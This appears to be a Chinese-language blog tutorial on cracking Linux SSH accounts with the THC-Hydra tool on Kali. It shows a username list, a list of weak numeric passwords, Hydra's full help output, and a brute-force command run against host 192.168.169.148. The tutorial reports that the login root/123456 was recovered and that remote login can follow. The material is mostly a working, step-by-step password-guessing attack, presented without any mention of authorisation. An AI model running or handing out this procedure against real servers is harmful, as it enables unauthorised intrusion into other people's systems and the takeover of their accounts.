破解Linux 远程登陆账号与密码的方式有很多中，你今天来学习一下 hydra破解工具

下载方式网站：https://www.thc.org/thc-hydra/

今天我们使用的是KALI系统 该系统是自带了很多破解工具，就不用安装啦。

下面我们来演示一下破解方法

一、生成一个账号文件，user.txt （名称自定义即可），在user.txt 里是需要破解的账号

root@ULINK:~# more user.txt

root

admin

admins

root@ULINK:~#

二、生成一个密码文件，pass.txt (名称自定义即可),在pass.txt 是破解账号需要的密码.

root@ULINK:~# more pass.txt

123

1234

12345

123456

1234567

12345678

123456789

1234567890

root@ULINK:~#

三 查看hydra 使用帮助

oot@ULINK:~# hydra -help | more

Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SOuvVd46] [serv

ice://server[:PORT][/OPT]]

Options:

-R restore a previous aborted/crashed session

-S perform an SSL connect

-s PORT if the service is on a different default port, define it here

-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE

-p PASS or -P FILE try password PASS, or load several passwords from FILE

-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help

-e nsr try "n" null password, "s" login as pass and/or "r" reversed login

-u loop around users, not passwords (effective! implied with -x)

-C FILE colon separated "login:pass" format, instead of -L/-P options

-M FILE list of servers to attack, one entry per line, ':' to specify port

-o FILE write found login/password pairs to FILE instead of stdout

-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)

-t TASKS run TASKS number of connects in parallel (per host, default: 16)

-w / -W TIME waittime for responses (32) / between connects per thread (0)

-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)

-v / -V / -d verbose mode / show login+pass for each attempt / debug mode

-O use old SSL v2 and v3

-q do not print messages about connection errors

-U service module usage details

server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)

service the service to crack (see below for supported protocols)

OPT some service modules support additional input (-U for module help)

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|diges

t}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak t

elnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL

v3.0. The newest version is always available at http://www.thc.org/thc-hydra

Don't use in military or secret service organizations, or for illegal purposes.

These services were not compiled in: sapr3 afp ncp oracle.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.

E.g.: % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)

% export HYDRA_PROXY_HTTP=http://proxy:8080

% export HYDRA_PROXY_AUTH=user:pass

Examples:

hydra -l user -P passlist.txt ftp://192.168.0.1

hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN

hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5

hydra -l admin -p password ftp://[192.168.0.0/24]/

hydra -L logins.txt -P pws.txt -M targets.txt ssh

root@ULINK:~#

四 我们破解192.168.169.148服务器的ssh 账号和密码

root@ULINK:~# hydra -L user.txt -P pass.txt -e n -vV 192.168.169.148 ssh

其中显示绿色的是服务器具有账号和密码

其中这样就破解成功了.账号为root 密码为123456

接下来我们就可以使用ssh 远程登陆该服务器啦.